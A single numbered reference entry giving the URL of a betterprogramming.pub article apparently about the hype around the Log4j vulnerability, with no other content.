[1] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221